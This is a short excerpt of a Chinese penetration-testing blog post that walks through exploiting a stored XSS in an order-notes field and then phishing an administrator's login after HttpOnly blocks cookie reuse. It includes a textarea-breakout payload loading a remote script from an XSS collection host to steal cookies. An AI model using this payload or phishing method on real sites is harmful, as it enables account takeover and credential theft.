i春秋作家:jasonx
原文来自:一个xss漏洞到内网漫游【送多年心血打造的大礼包啦!】
前言
渗透过程中,有时候遇某些网站,明明检测到有xss漏洞,但是盲打以后,收到的cookie还是不能登录后台,大多数的原因都是因为对方的cookie关键参数开启了httponly,导致你获取到的cookie参数不全,所以没法登录。
今天和大家分享一次绕过httponly拿后台的思路。
0x01 遇到一个存在xss的站点
这个站点在提交订单的时候,下面有个订单备注输入框存在存储型xss。
我们直接插入插入xss代码;
</textarea>'"><script src=https://xx.cc/x/7Zbi58></script>

过了没多久拿到了cookie

但是我们尝试用cookie登录的时候失败了。

那么问题来了,如何才能拿到后台呢?
0x02 xss钓鱼拿下后台
因为xss平台已经收到后台的url地址了。
那么我们直接访问这个后台地址,然后右键查看源代码。

本文介绍了如何在遇到开启HTTPOnly的网站时,利用XSS漏洞钓鱼拿下后台。通过创建钓鱼HTML文件,修改相对路径为绝对路径,并通过XSS平台触发,实现管理员在不知情的情况下输入账号密码,从而获取内网权限。
最低0.47元/天 解锁文章
2735

被折叠的 条评论
为什么被折叠?



